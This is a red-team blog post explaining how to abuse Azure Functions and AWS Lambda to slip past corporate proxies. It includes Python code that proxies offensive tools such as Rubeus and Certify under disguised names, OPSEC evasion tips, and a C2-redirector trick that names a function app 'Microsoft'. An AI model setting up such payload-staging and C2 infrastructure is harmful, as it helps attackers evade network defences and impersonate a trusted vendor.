
Servers are overrated – Bypassing corporate proxies (ab)using serverless for fun and profit.

Last updated on 22 October 2021

Serverless functions are nothing new: AWS Lambda has existed since 2014 and Microsoft followed in 2016. For many of us, however, it is still a magic box, and not much has been done so far to explore the offensive capabilities of this functionality (that I know of, at least).

I have some interesting ideas on this topic, and I might release several blogposts about having “fun” with serverless. For this blogpost I thought a nice proof of concept would be to use serverless functionality to proxy arbitrary content from another website, and we’ll also be (ab)using Azure Functions to proxy C2 traffic.

As this will be a rather lengthy post, I have split up the sections into Azure and AWS where applicable. The Azure approach will be prefixed with AZURE, whereas the AWS sections will be prefixed with AWS, in case you want to ctrl+F to find the information relevant to you.

This blogpost has code examples, all of which can be found on my GitHub.
The serverless applications that serve as examples in this blogpost will no longer be active at the time of release, to avoid having you people ruin my credit card bill by spamming requests to my serverless functions :).

Repo: https://github.com/jfmaes/FunWithServerless

Pro tip: if the images are too small on your computer, right click and open them in a new tab for better quality.

WTF is serverless?

So glad you asked, Timmy! AWS and Azure (and probably other cloud providers as well) offer functionality to invoke code ‘dynamically’ without you having to provide infrastructure to run it on. In reality, of course, the function still runs on a server, usually in the form of a container that spins up to run your code and then happily dies again afterwards. It is a bit more complex than that, but for the sake of this blogpost, that is honestly all you need to know about it.

Why should I care?

A lot of technology is moving (or has already moved) to the cloud. It is hard for companies to block access to these cloud services completely. By leveraging the cloud ourselves, in this case using serverless, we have a good chance of bypassing corporate outbound internet restrictions.


Decisions decisions… Runtimes

Now that we know what serverless is, we have an important first design decision to make! Which runtime are we going to use? AWS and Azure both come with a ton of supported languages to write our serverless code in, so which one do we pick?

Thankfully there is some overlap between the supported languages, which means we don’t have to port our serverless code from one language to another to run on both Azure and AWS. For simplicity’s sake, I have chosen to create the binary proxy proof-of-concept in Python, as I feel most readers are at least in some way, shape or form familiar with it.

If you do not have Python installed on the computer you want to develop your function on, you’d best install it 🙂

Press F12 for 1337 hax.

Enough BS, let’s get coding! – Use case 1: Content Proxying.

For the remainder of the blog, I will split the sections into an Azure section and an AWS section and finish it off with a conclusion. The reason is that even though Azure and AWS both support Python, there are some differences in approach, which means the code itself is not an exact one-to-one mapping.

The main differences are that Azure and AWS treat package dependencies differently, and that AWS needs an additional “part” (API Gateway) to make your serverless function accessible.

Before we dive into that though, let’s first discuss what our Function will do:

Our application consists of two main components:

  1. A JSON watchlist, called the Bouncer, which contains the “name” of the content we want to proxy and where to find it (the URL).
  2. A Python script that makes the request and returns the content back to us if the Bouncer lets you in.

All in all quite straightforward:

  1. You invoke the serverless function and pass it the name of what you want to fetch.
  2. The serverless function checks with the bouncer whether the thing you want to fetch is on the list.
  3. If it is on the list, the request gets passed on to the actual destination (the location of the proxy target).
  4. The proxy target gets fetched by the serverless function.
  5. The serverless function returns the data to the user.

For some extra fun, the name is obviously arbitrary. Imagine that you are fetching a C2 payload: you could call it something like RedTeamerDotTipsRules, and as long as your backend maps RedTeamerDotTipsRules to your C2 payload, it’s all good.
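To make that concrete, the body of the request we will send to the function later on is just a tiny piece of JSON with that name in it:

{
    "name": "RedTeamerDotTipsRules"
}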

AZURE: Creating our Azure environment

Creating an Azure account is actually completely free, but you will need a valid credit card to verify your identity ¯\_(ツ)_/¯.
To develop Azure Functions as easily as possible, I highly recommend getting Visual Studio Code and the Azure Functions plugin and Python plugin for it.

Once installed, you will see a new symbol resembling the letter A in the toolbar on the left. Clicking it will take you to the Azure extension tab in Visual Studio Code, where you can sign up for a new account if you haven’t done so already, or sign in to an existing one. Once signed in, you can Create New Project…:

VSCode will then ask you for the folder in which you want to put the project and for the project’s runtime (language). Select the folder you desire and pick Python. VSCode will then enumerate your Python installations and ask which interpreter you want to use; pick the one applicable to you.

VSCode will now ask which Azure Functions template you want to use. As we would like to be able to call our serverless function on an HTTP event, we will use the HTTP trigger template:

VSCode will now ask you to name your function. Name it as you please; in this example our function will be called ContentProxy.
As a final question, VSCode will ask you about the authorization method for your function. If you would like to learn more about function auth, feel free to read the documentation here:

https://docs.microsoft.com/en-us/azure/azure-functions/functions-bindings-http-webhook-trigger?tabs=python#configuration

For now, let’s go with anonymous authorization. The Azure extension will then create boilerplate code for you, which should look as follows:

When you installed the Azure extension, the Azure Functions Core Tools should normally have been installed automatically as well. The cool thing about this is that you can run and debug your Azure function locally before shipping it off to the cloud: go to the debug/execute tab on the left, click the green play (Attach to…) button, and your function will run locally:

Browsing to the URL results in:

Congratulations, your first (quite boring) Azure function is born!

Adding the special Sauce

Let’s start with creating our Bouncer.
Add a new file to your project and call it watchlist.json.
For our PoC we are going to rely upon one of my awesome colleagues, Melvin Langvik aka @Flangvik, and leverage his SharpCollection of precompiled goodies.

An example watchlist.json file could look as follows:

{
    "Tools": [
      {
        "name": "RedTeamerDotTipsRules",
        "url": "https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_Any/Rubeus.exe"
      },
      {
        "name": "TrustedSecForTheWin",
        "url": "https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.0_Any/Certify.exe"
      }
    ]
}

Now that we have our watchlist configured, we need to code the logic that interprets this watchlist file and does the magic. This lives in a file called contentproxy.py, which we will import from __init__.py later:



import json
import requests
import pathlib


# the bouncer (watchlist.json) lives right next to this script
bouncer_file = pathlib.Path(__file__).parent / 'watchlist.json'

def get_tool_information(toolName):
    # ask the bouncer whether the requested name is on the list
    with open(bouncer_file) as bouncer:
        data = json.load(bouncer)
    for tool in data["Tools"]:
        if toolName in tool["name"]:
            return tool
    raise Exception("{0} not found in the watchlist, please add it.".format(toolName))


def get_tool_url(toolName):
    toolinfo = get_tool_information(toolName)
    return toolinfo["url"]


def fetch_tool(url):
    # fetch the proxy target and hand the raw bytes back to the caller
    req = requests.get(url, verify=False)
    return req.content


And then we need to call all this good stuff in our __init__.py file:

import logging
import azure.functions as func
from . import contentproxy


def main(req: func.HttpRequest) -> func.HttpResponse:
    toolName = ""
    logging.info('Python HTTP trigger function processed a request.')
    try:
        req_body = req.get_json()
    except ValueError:
        pass
    else:
        toolName = req_body.get('name')
    if toolName:
        # ask the bouncer where the tool lives, fetch it and return the raw bytes
        url = contentproxy.get_tool_url(toolName)
        tool_data = contentproxy.fetch_tool(url)
        return func.HttpResponse(tool_data)
    # no (valid) name supplied, politely refuse
    return func.HttpResponse("could not process request.", status_code=400)

And to wrap it all up, Azure is kind enough to automatically install the Python packages that we define in our requirements.txt file – if any AWS engineers are reading this, TAKE NOTE:

# DO NOT include azure-functions-worker in this file
# The Python Worker is managed by Azure Functions platform
# Manually managing azure-functions-worker may cause unexpected issues

azure-functions
requests
configparser
pathlib

Testing our proxy

As we are using POST requests and not GET requests, testing is not as easy as just browsing to our localhost function. In my opinion, the easiest way to test REST APIs is with a tool called Postman. We will test our proxy by sending a POST request with one of the tool names we added to our watchlist.json, and as expected, we get binary data back (notice the MZ magic bytes indicating a PE file):
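If you would rather script the test than click around in Postman, a minimal client sketch could look like this (assuming the default local URL of the Azure Functions Core Tools, http://localhost:7071/api/ContentProxy; adjust the host and function name to your own setup):

import requests

# hypothetical local endpoint - adjust the host and function name to your setup
FUNCTION_URL = "http://localhost:7071/api/ContentProxy"

# ask for one of the names we put in watchlist.json
resp = requests.post(FUNCTION_URL, json={"name": "RedTeamerDotTipsRules"})
resp.raise_for_status()

# the function returns the raw PE file, so write the bytes straight to disk
with open("fetched.bin", "wb") as f:
    f.write(resp.content)

# should print b'MZ' for a PE file
print(resp.content[:2])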

Now that we know that our function works, we can kick it off to the cloud:

Give your application a benign name; I called my function app sentinelcarbonstrike.

Now that it has been kicked to the cloud, let’s see if our app still works as expected by sending a POST request to sentinelcarbonstrike:

Seems to work properly 😉

AWS: Setting up the AWS environment

As I already hinted earlier in this blogpost, AWS and Azure don’t really use the same design principles when it comes to building serverless functions.
Azure gives you a browsable URL out of the box in the form of *.azurewebsites.net.

AWS, on the other hand, does not do that automatically. You need a second AWS service, API Gateway, to expose your function to the world.

The second major difference between Azure and AWS is that AWS does not give you the option to add a requirements.txt file for Python deployments that it will automatically install for you in the runtime environment. Instead, AWS provides a Python environment that comes bundled with several well-known Python packages. The best documentation I have seen about this is actually not from AWS themselves, but on GitHub:

https://gist.github.com/gene1wood/4a052f39490fae00e0c3

If you want to create your own runtime environment, that is also a possibility. In case you want to go down that rabbit hole, here is a good place to start:

https://docs.aws.amazon.com/lambda/latest/dg/python-package.html#python-package-dependencies

https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html

I myself did not go down that rabbit hole and simply modified the PoC I had for Azure to play nice with AWS.

AWS also has a Visual Studio Code extension, but for me it didn’t do the trick as smoothly as Azure’s extension does. So for this one, I did some manual work in the AWS GUI itself. Feel free to follow your own path and use APIs or extensions as you see fit.

The first thing I did was create my proxy Lambda function:

I copied over the boilerplate code to my Visual Studio Code:

And I then proceeded to create my API Endpoint using AWS API Gateway:

Set the integration to the Lambda function you created:

Then set up routing. For this blogpost I selected ANY, but you can also make a distinction between HTTP verbs if you want to do redirection based on the verb (an exercise for the reader: it involves creating a new redirector lambda and adding a second integration to your API Gateway; see the sketch below for a starting point).
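If you want a head start on that exercise, a redirector lambda really does not need much. A minimal sketch could look like this (the target URL is just a placeholder I picked; point it wherever you want to dump unwanted traffic):

# redirector.py - hypothetical sketch of a second lambda behind the same API Gateway
def lambda_handler(event, context):
    # bounce everything that hits this route to a benign page,
    # so unwanted verbs or nosy visitors never see the real content
    return {
        'statusCode': 302,
        'headers': {'Location': 'https://www.microsoft.com/'},
        'body': ''
    }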

Then do the familiar next, next, next (because who reads documentation anyway) and you’ll get a randomly generated AWS endpoint that points to your lambda.

Let’s verify if it works:

Great, we got a totally legit-looking URL that we can use to proxy binaries!


Now we need to modify our boilerplate lambda:

I discovered that, in order for AWS to correctly retrieve the watchlist JSON, I needed to create an empty __init__.py, thanks to this GitHub gem:
https://gist.github.com/gene1wood/06a64ba80cf3fe886053f0ca6d375bc0

Additionally, Lambda doesn’t really play nice with raw binary data, so I had to adapt the code to return the binary content base64-encoded. That is the only data type I support in this PoC code; with minor adjustments you can of course get it to work with other data types as well.

The file structure looks like this:

As mentioned, __init__.py is empty.
Contrary to what we did in the Azure function, the requests library is not bundled with the AWS Lambda Python runtime by default, but urllib3 is, so I revised the code to take that into consideration:

binproxy.py

import json
import ssl
import urllib3
import pathlib


# the watchlist lives right next to this script, just like in the Azure version
watchlist_file = pathlib.Path(__file__).parent / 'watchlist.json'

def get_tool_information(toolName):
    # ask the bouncer whether the requested name is on the list
    with open(watchlist_file) as watchlist:
        data = json.load(watchlist)
    for tool in data["Tools"]:
        if toolName in tool["name"]:
            return tool
    raise Exception("{0} not found in the watchlist, please add it.".format(toolName))


def get_tool_url(toolName):
    toolinfo = get_tool_information(toolName)
    return toolinfo["url"]


def fetch_tool(url):
    # requests is not bundled with the Lambda runtime, so use urllib3 instead
    # (certificate checks disabled, the equivalent of verify=False)
    https = urllib3.PoolManager(cert_reqs=ssl.CERT_NONE)
    urllib3.disable_warnings()
    req = https.request('GET', url)
    return req.data

lambda_function.py – as you can see, there is a hard-coded octet-stream header here (required, otherwise API Gateway farts):

import json
import base64
from . import binproxy


def lambda_handler(event, context):
    try:
        body = json.loads(event['body'])
        toolName = body.get("name")
        if not toolName:
            return {'statusCode': 400, 'body': 'could not process request.'}
        url = binproxy.get_tool_url(toolName)
        bin_data = binproxy.fetch_tool(url)
        return {
            # hard-coded octet-stream header, otherwise API Gateway farts
            'headers': {"Content-Type": "application/octet-stream"},
            'statusCode': 200,
            'body': base64.b64encode(bin_data).decode('utf-8'),
            'isBase64Encoded': True
        }
    except Exception as e:
        # returning the bare exception object would fail serialization,
        # so return the message in a proper response instead
        return {'statusCode': 500, 'body': str(e)}

For me, pushing to AWS using the VSCode plugin isn’t an option, so I use the GUI. You need to ZIP up your lambda function before you can upload it.
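If you do not want to build the ZIP by hand every time, a couple of lines of Python do the job as well (a sketch, assuming your function files live in a folder called binproxy_lambda; use whatever folder name and structure matches your handler setting):

import shutil

# zip up the folder that holds lambda_function.py, binproxy.py,
# __init__.py and watchlist.json into binproxy_lambda.zip
shutil.make_archive("binproxy_lambda", "zip", root_dir="binproxy_lambda")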
Testing, this time with Lambda instead of Azure Functions 🙂

A quick note on OPSEC

I already gave a hint about changing the names of the tooling you want to proxy to something benign. In this example I am also specifically using POST requests, so the name of the requested tool isn’t shown in the URL directly.

Obviously you can do more shenanigans, such as redirecting all unsupported HTTP requests and all requests that try to fetch something that isn’t on the bouncer list. That will largely be an exercise for the reader (else where’s the fun? 🙂), but a small starting point is sketched below.
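As a starting point, here is a rough sketch (not the code from the repo) of what the fallback in the Azure function could look like, redirecting anyone the bouncer does not recognise to a benign page:

import azure.functions as func

def bounce() -> func.HttpResponse:
    # hypothetical fallback: anything the bouncer doesn't know about gets
    # silently redirected to a harmless page instead of an error message
    return func.HttpResponse(
        status_code=302,
        headers={"Location": "https://www.microsoft.com/"}
    )

You would call something like this from __init__.py instead of returning the 400 response, and do the same for anything that throws an exception.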

Enough BS, let’s get coding! – Use case 2: Serverless for C2 (AZURE only)

There have been countless blogposts about exotic methods to get a C2 channel up and running. My go-to used to be domain fronting, but that is now (as good as) dead. Several other good options exist, such as using Cloudflare Workers or Firebase. Azure has also been scrutinized already, as shown here: https://www.trustedsec.com/blog/azure-application-proxy-c2/.

I wanted to explore if we can use serverless in AWS and Azure for this.
I quickly realized that using AWS for this is not worth it, as you don’t get a custom domain assigned based on your function. Using AWS Lambda as a C2 proxy would therefore be pretty much the same as just using CloudFront itself, so I abandoned that avenue quickly.

However, when exploring the Azure Functions avenue, I encountered something quite interesting that, to me, looks and feels like a security vulnerability, which I (ethical person that I am) reported to Microsoft’s Research Center. I received the following email back from them:

I am very curious how long it will take from the release of this blogpost to a silent patch from Microsoft’s side, without of course giving me any credit for my finding :).
I will agree it is not a very high-impact vulnerability from Microsoft’s perspective, but the implications are pretty big if adversaries start impersonating Microsoft; have fun filtering those logs out if you get popped…

Much like with Azure CDN, I was curious to see if I could use “reserved words”: basically a blacklist that Microsoft keeps for security reasons. One of those reserved words is Microsoft.
When trying it in Visual Studio Code, I got this nice little pop-up:

Alright, cool, that works as intended. To my surprise, however, when trying the same thing in the GUI…

I got a nice green checkmark! Maybe that’s just client-side validation though, and the function won’t work when we actually try to create it.

I chose JavaScript (Node) as my stack and picked the latest version.

Important: I chose Linux as the host for my function app, not Windows (which is ticked by default in the GUI).

To my surprise, it seemed to work just fine.

However, I could not deploy to it. Apparently, when you create a function app manually in the GUI, it isn’t configured properly: the ‘AzureWebJobsStorage’ setting is not provided automatically (deploying using VSCode does that for you).

After some investigation, I figured out how to fix that issue.
We need to create a new storage account in our resource group:

I picked zone-redundant storage. I am not sure whether that is required, but it seems to be the default that gets pushed if you deploy using the VSCode extension, so I just mimicked those settings.

Now we need to bind our function to this storage account. We can do that by going to the access keys tab of our storage account:

Copy the connection string:

And place it as a new variable in our function configuration, calling it AzureWebJobsStorage:
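The value you paste in is the full connection string of the storage account, which looks roughly like this (account name and key redacted; yours will obviously differ):

AzureWebJobsStorage = DefaultEndpointsProtocol=https;AccountName=<storageaccountname>;AccountKey=<accountkey>;EndpointSuffix=core.windows.net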

I now created a new Azure Application using the Azure extension in VSCode and chose Node and HTTP trigger.

I changed the source code a little bit (index.js) and called my function totallynotc2traffic:

module.exports = async function (context, req) {
    context.log('JavaScript HTTP trigger function processed a request.');

    const name = (req.query.name || (req.body && req.body.name));
    const responseMessage = name
        ? "Hello, " + name + ". This HTTP triggered function executed successfully."
        : "jfmaes was here. it is a bug not a vuln.";

    context.res = {
        // status: 200, /* Defaults to 200 */
        body: responseMessage
    };
}

I then published it to the application and, surprise surprise:

If you want to set up a complete proxy, I recommend following these steps:

https://fortynorthsecurity.com/blog/azure-functions-functional-redirection/

I tried to work something out in Node.js but failed 😛 (I had never used Node before and could not get http-proxy-middleware and azure-function-express to play nicely together). This would be a nice follow-up blogpost if someone wants to have a swing at it.

Conclusion:

Serverless is an interesting technology that is underutilized for offensive operations.
Especially when combined with automated DevOps pipelines (looking at you, Azure), advanced operators could build some truly evil tradecraft leveraging these technologies.


